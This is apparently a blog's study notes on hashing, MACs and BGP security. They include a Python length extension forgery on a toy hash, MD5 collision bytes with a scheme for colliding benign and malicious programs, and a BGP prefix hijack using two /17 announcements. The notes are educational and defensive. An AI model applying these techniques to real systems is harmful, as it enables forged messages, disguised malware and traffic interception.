  It’s unwise to save passwords as plaintext because every user will be compromised if the password database is stolen. If we store the hashed value of password instead, due to the one-way property, it is difficult for the attacker to get user’s password.
  - The use of salt
    
    If multiple users have the same password, their hashed values will be the same. To avoid this situation, we usually hash the password concatenated with a random string called a salt. This ensures that the hashed values differ even if two users have identical passwords.
  - On Linux, the hashed password is acquired by hashing the password-salt mixture 5000 times. This slows the hashing process by a factor of 5000, which effectively slows down brute-force attacks.
  - None of the IV, nonce, and salt are necessarily confidential.
- Trusted timestamping
  
  Sometimes we would like to prove we hold the copyright of a digital document without publishing it. To do so, we can use a service called trusted timestamping. Basically, instead of publishing the entire digital content, one only publishes the hashed value of the content, either in printed media or by submitting it to a Time Stamping Authority (TSA). The TSA will sign the hash with its private key to certify its validity.
- Message Authentication Code (MAC)
  
  MAC is used to detect whether the message has been modified or not during transmission. We can use one-way hash functions to implement MAC. Obviously, we cannot just use the hash of a message as the MAC, because this allows anyone to forge the MAC. We need to concatenate a secret key with the actual message first, and then compute the hash. As it turns out, whether the key is put before or after the message significantly affects the security of the resulting MAC. $\newcommand{\mac}{\operatorname{Hash}}$$\newcommand{\msum}{\mathbin{\left\lVert\right.}}$
  - Length extension attack
    
    Denote the secret key by $K$ and message by $M$. Computing the MAC as $\mac(M \msum K)$ avoids this attack. If one computes the MAC by $\mac(K \msum M)$, it will lead to security loopholes!
    
    Review the Merkle–Damgård construction process. If we compute the MAC by $\mac(K \msum M)$, it is possible to extend the length of $M$ and generate the correct MAC without knowing what the key is! More concretely, the attacker needs to know the padding $P$; then, given any message $T$, he can obtain the valid MAC of the extended message $M \msum P \msum T$, which is $\mac(K \msum M \msum P \msum T)$. This is because the Merkle–Damgård construction breaks the message down into blocks and uses chained compression functions to compute the output, and the known MAC is exactly the chaining state after $K \msum M \msum P$. What the attacker needs to do is to continue the chain from that state with $T$, as if $K \msum M \msum P \msum T$ were one complete message.
  - Key-Hash MAC Algorithm (HMAC)
    
    It is really important to avoid reinventing the wheel in cryptography, since the tiniest error can lead to severe security flaws. Almost all existing libraries and algorithms are carefully tweaked to enhance security. There is a well-known algorithm to generate a MAC given a key and a message: we should simply call $\operatorname{HMAC}(K, M)$.
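The length extension attack and the HMAC alternative can be sketched as follows. The hash here is a toy Merkle–Damgård construction assumed for this illustration: its compression function is truncated SHA-256, its block size is 64 bytes, and its padding is `0x80`, zeros, then an 8-byte length. It is not MD5 or SHA-1, but it has the same chaining structure. The key, messages, and function names are hypothetical.

```python
import hashlib
import hmac

BLOCK = 64
IV = b"\x00" * 16

def compress(state: bytes, block: bytes) -> bytes:
    """Toy compression function (assumption): truncated SHA-256."""
    return hashlib.sha256(state + block).digest()[:16]

def md_padding(total_len: int) -> bytes:
    """Padding for a message of total_len bytes: 0x80, zeros, 8-byte length."""
    pad = b"\x80" + b"\x00" * ((BLOCK - 9 - total_len) % BLOCK)
    return pad + total_len.to_bytes(8, "big")

def toy_hash(message: bytes, state: bytes = IV, already: int = 0) -> bytes:
    """Hash `message`, optionally resuming from `state` after `already` bytes."""
    data = message + md_padding(already + len(message))
    for i in range(0, len(data), BLOCK):
        state = compress(state, data[i:i + BLOCK])
    return state

key = b"top-secret-key"
msg = b"amount=10&to=bob"
tag = toy_hash(key + msg)                    # MAC computed as Hash(K || M)

# The attacker knows msg, tag and len(key), but not the key itself.
glue = md_padding(len(key) + len(msg))       # the padding P
extra = b"&to=mallory"                       # the appended text T
forged_msg = msg + glue + extra
forged_tag = toy_hash(extra, state=tag,
                      already=len(key) + len(msg) + len(glue))

print(forged_tag == toy_hash(key + forged_msg))   # the forged MAC is accepted

# The recommended approach: HMAC from the standard library.
good_tag = hmac.new(key, msg, hashlib.sha256).hexdigest()
print(good_tag)
```

The forged tag is computed from `tag` alone, which is exactly the chaining state after `K || M || P`. HMAC wraps the hash in two keyed passes, so a published tag is not a reusable chaining state.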
Hash Collision Attacks
- Forging fake public-key certificates
  
  Suppose an attacker can find two certificates that share the same hash value but have different common names. For example, the first one’s CN is example.com, and the second one’s CN is the attacker’s own attacker32.com. Then he can let the CA sign the second version. Because the signature is computed over the hash, it is equally valid for the first version, and he will effectively have a valid certificate for example.com.
  
  This idea can be extended to forging fake signed programs, PDF documents and so on.
- Generating two different files with the same MD5 hash
  
  The tool developed by Marc Stevens can generate two files that share the same MD5 value. The prefixes of the two files are the same. For example, messages one and two are shown below.
```
$ cat message1.bin | xxd
00000000: 4dc9 68ff 0ee3 5c20 9572 d477 7b72 1587  M.h...\ .r.w{r..
00000010: d36f a7b2 1bdc 56b7 4a3d c078 3e7b 9518  .o....V.J=.x>{..
00000020: afbf a200 a828 4bf3 6e8e 4b55 b35f 4275  .....(K.n.KU._Bu
00000030: 93d8 4967 6da0 d155 5d83 60fb 5f07 fea2  ..Igm..U].`._...

$ cat message2.bin | xxd
00000000: 4dc9 68ff 0ee3 5c20 9572 d477 7b72 1587  M.h...\ .r.w{r..
00000010: d36f a7b2 1bdc 56b7 4a3d c078 3e7b 9518  .o....V.J=.x>{..
00000020: afbf a202 a828 4bf3 6e8e 4b55 b35f 4275  .....(K.n.KU._Bu
00000030: 93d8 4967 6da0 d1d5 5d83 60fb 5f07 fea2  ..Igm...].`._...
```
  The MD5 and SHA-1 sums of these two messages are shown below.
```
$ md5sum message1.bin message2.bin
008ee33a9d58b51cfeb425b0959121c9 message1.bin
008ee33a9d58b51cfeb425b0959121c9 message2.bin

$ sha1sum message1.bin message2.bin
c6b384c4968b28812b676b49d40c09f8af4ed4cc message1.bin
c728d8d93091e9c7b87b43d9e33829379231d7ca message2.bin
```
  If the hash function uses the Merkle–Damgård construction (as MD5 does), then we can use the length extension technique to append a common suffix to both message1.bin and message2.bin, and their resulting hash values will still be the same.
- Generating two programs with the same MD5 hash
  
  We can use the same idea to generate two programs with the same MD5 hash. Suppose the program is given as follows. Assume the xyz array is filled with 200 'A' characters.
```
#include <stdio.h>
unsigned char xyz[200] = {"..."}; // fill with actual content

int main(){
    int i;
    for(i = 0; i < 200; ++i){
      printf("%x ", xyz[i]);
    }
}
```
  Now, we can locate the xyz array inside the program’s binary, and we can divide the program into three parts:
  1. The prefix (whose length must be a multiple of 64)
  2. The center (whose length must be 128)
  3. The suffix
  The center must lie completely inside the xyz array, since it will be filled with arbitrary content and must not affect the program’s control logic. We run the MD5 collision generator on prefix+center, and we require the prefix part of the two generated messages to be the same. As a result, we are able to come up with two versions of this program, which can be represented by
  1. Version 1: prefix+Q
  2. Version 2: prefix+P
  
  where P and Q are different, but both versions have the same hash value. The next step is to use the length extension technique to concatenate the suffix to these two versions. As a result, we have created two programs
  1. Program 1: prefix+Q+suffix
  2. Program 2: prefix+P+suffix
  
  which have identical hash values but different data stored in the xyz array.
  
  To alter the control logic of program 1 and program 2 in the attacker’s favor, one can check if xyz is still filled with all A’s in later code sections. If xyz is not all A’s, then the program can start to execute some malicious code. That is to say, we can create two programs that have the same hash value, but one is benign and the other one is malicious.
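The suffix step used in both constructions above can be checked directly with the two 64-byte messages from the hex dump. The bytes below are copied from that dump, while the suffix is an arbitrary string chosen for this sketch.

```python
import hashlib

# message1.bin and message2.bin, transcribed from the xxd output above.
m1 = bytes.fromhex(
    "4dc968ff0ee35c209572d4777b721587"
    "d36fa7b21bdc56b74a3dc0783e7b9518"
    "afbfa200a8284bf36e8e4b55b35f4275"
    "93d849676da0d1555d8360fb5f07fea2"
)
m2 = bytes.fromhex(
    "4dc968ff0ee35c209572d4777b721587"
    "d36fa7b21bdc56b74a3dc0783e7b9518"
    "afbfa202a8284bf36e8e4b55b35f4275"
    "93d849676da0d1d55d8360fb5f07fea2"
)

def md5(data: bytes) -> str:
    return hashlib.md5(data).hexdigest()

print(m1 != m2, md5(m1) == md5(m2))              # different files, same MD5

# Appending the same suffix keeps the MD5 values equal, because both
# messages leave MD5 in the same internal state after their 64-byte block.
suffix = b"any common suffix, e.g. the rest of a program"
print(md5(m1 + suffix) == md5(m2 + suffix))

# A hash function without a known collision for this pair tells them apart.
print(hashlib.sha256(m1).hexdigest() == hashlib.sha256(m2).hexdigest())
```

This is the same reason prefix+Q+suffix and prefix+P+suffix collide: once the internal states agree at a block boundary, any shared continuation preserves the agreement.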

BGP: Border Gateway Protocol

Four types of Autonomous Systems (AS)
- Stub
- Multihomed
- Transit
- Internet Exchange Point (IXP)
BGP speakers

Each AS has one or more BGP speakers that talk to other ASes. Over a BGP session, they constantly exchange information about which destinations the AS can reach; this is called peering. As a result, a piece of information shared by a single AS can be propagated to the entire Internet.

BGP update

Routing information is updated by prefix advertisement: an AS will announce a specific network prefix is reachable via this AS. For example, AS 11872 can announce prefix 128.230.0.0/16 is reachable.
There can be multiple paths available to a specific prefix. Usually, the AS will only propagate one path to its neighbor. This path is selected by the path selection algorithm.

The path selection algorithm selects a path from the BGP table. A sample BGP table is shown below.

$ telnet route-views.optus.net.au
route-views.optus.net.au>show bgp
BGP table version is 1098639742, local router ID is 203.202.125.6
Status codes: s suppressed, d damped, h history, * valid, > best, i - internal,
              r RIB-failure, S Stale, m multipath, b backup-path, x best-external
Origin codes: i - IGP, e - EGP, ? - incomplete

   Network          Next Hop            Metric LocPrf Weight Path
*  1.0.0.0/24       203.202.143.33                         0 7474 4826 13335 i
*                   202.139.124.130          1             0 7474 4826 13335 i
*                   203.13.132.7            10             0 7474 4826 13335 i
*>                  203.202.143.34                         0 7474 4826 13335 i
*                   192.65.89.161            1             0 7474 4826 13335 i
*> 1.0.4.0/24       203.202.143.33                         0 7474 4826 38803 56203 i
*                   202.139.124.130          1             0 7474 4826 38803 56203 i
*                   203.13.132.7             1             0 7474 4826 38803 56203 i
*                   203.202.143.34                         0 7474 4826 38803 56203 i
*                   192.65.89.161            1             0 7474 4826 38803 56203 i

The selection criteria include, in order of precedence:

1. Weight (a larger value is preferred)
2. Local preference (a larger value is preferred)
3. Locally generated/aggregated routes
4. Shortest AS path length

Path prepending

Suppose an AS is connected to several ISPs (all ASes themselves), but the AS prefers the traffic to go through one particular ISP, while the others are reserved as backups. The AS can enforce this preference by doing path prepending: it intentionally repeats its own AS number multiple times in the announcements sent through the backup ISPs, which increases the length of the AS path seen by others.
Besides updates, withdrawal messages can be propagated as well.
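The selection criteria and the effect of path prepending can be sketched as a simple comparison. This is a simplified model, not a router implementation: the `Route` class, the default local preference of 100, and the private AS numbers are assumptions made for this example, and real BGP has further tie-breakers.

```python
from dataclasses import dataclass

@dataclass(frozen=True)
class Route:
    next_hop: str
    as_path: tuple
    weight: int = 0
    local_pref: int = 100          # assumed default value
    locally_originated: bool = False

def preference_key(route):
    """Smaller key wins: higher weight, higher local preference,
    locally originated routes, then the shortest AS path."""
    return (-route.weight, -route.local_pref,
            not route.locally_originated, len(route.as_path))

def best_path(routes):
    return min(routes, key=preference_key)

MY_AS, ISP_A, ISP_B = 64512, 64601, 64602   # hypothetical private AS numbers

# As seen by a remote AS: the backup path was prepended twice by MY_AS.
primary = Route("ISP-A", (ISP_A, MY_AS))
backup = Route("ISP-B", (ISP_B, MY_AS, MY_AS, MY_AS))
chosen = best_path([backup, primary])
print(chosen.next_hop)

# Local preference is checked before AS path length, so it can override prepending.
pinned = Route("ISP-B", backup.as_path, local_pref=200)
overridden = best_path([pinned, primary])
print(overridden.next_hop)
```

Prepending only influences the AS path length criterion, so it works as a hint rather than a guarantee: a remote AS that sets a higher local preference for the backup path will still use it.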

Interior BGP (IBGP): the protocol used for BGP speakers inside one AS to communicate internally.
Interior Gateway Protocol (IGP): a type of protocol used for exchanging routing information between gateways (commonly routers) within an autonomous system.

Examples:
- Routing Information Protocol (RIP)
- Open Shortest Path First (OSPF)
Overlapping routes

When an IP address matches multiple entries in the BGP table, the entry with the longest matching prefix is selected.
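Longest-prefix matching can be sketched with the standard `ipaddress` module. The table below is hypothetical: only 128.230.0.0/16 comes from the text, while the more specific /18 entry, the default route, and the next-hop labels are made up for illustration.

```python
import ipaddress

def longest_match(table, address):
    """Return the next hop of the most specific prefix containing `address`."""
    addr = ipaddress.ip_address(address)
    best_net, best_hop = None, None
    for prefix, next_hop in table.items():
        net = ipaddress.ip_network(prefix)
        if addr in net and (best_net is None or net.prefixlen > best_net.prefixlen):
            best_net, best_hop = net, next_hop
    return best_hop

table = {
    "0.0.0.0/0": "default",
    "128.230.0.0/16": "AS 11872",
    "128.230.64.0/18": "site-B",     # hypothetical more specific entry
}

print(longest_match(table, "128.230.70.1"))    # inside both the /16 and the /18
print(longest_match(table, "128.230.200.1"))   # inside the /16 only
print(longest_match(table, "8.8.8.8"))         # only the default route matches
```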

Overlapping routes can be used to achieve:
- Globalization: split subnets into multiple geographic locations in the world.
- Load balancing: allocate each subnet to a BGP entry
IP Anycast

To achieve load balancing, there are two approaches:
- Use domain name: dynamic DNS can assign different IP addresses for load balancing
- Use IP anycast: all machines have the same IP address, you only need to reach one of them that has the best AS path.
- IP anycast is usually used for stateless services/short connections.
Prefix hijacking attack

Suppose you want to hijack 128.230.0.0/16. What you need to do is to announce two new entries
```
128.230.0.0/17
128.230.128.0/17
```
Because routers select the longest matching prefix, these two /17 entries win over the original /16, and all traffic to 128.230.0.0/16 will be diverted to you.
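The effect of the two more specific announcements can be checked with the standard `ipaddress` module. The routing table and the labels "legitimate" and "attacker" are a toy model assumed for this sketch.

```python
import ipaddress

victim = ipaddress.ip_network("128.230.0.0/16")

# Splitting the /16 in half yields exactly the two /17 prefixes to announce.
hijack = list(victim.subnets(prefixlen_diff=1))
print([str(net) for net in hijack])

table = {victim: "AS 11872 (legitimate)"}
table.update({net: "attacker" for net in hijack})

def route(address):
    """Pick the entry with the longest prefix that contains the address."""
    addr = ipaddress.ip_address(address)
    matches = [net for net in table if addr in net]
    return table[max(matches, key=lambda net: net.prefixlen)]

print(route("128.230.1.1"), route("128.230.255.254"))
```

Every address in the /16 falls into one of the two /17 prefixes, so the legitimate entry is never selected even though it is still present in the table.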
BGP Protection
- Encryption
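- TTL Security: because BGP speakers are usually directly connected, they can set the packet TTL to 255 and reject packets that arrive with a lower TTL. If a packet comes from a remote host, its TTL has been decremented along the way, so it is impossible for the TTL to be 255.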
- Filtering: filter prefix updates and paths.

Alan Xiang's Blog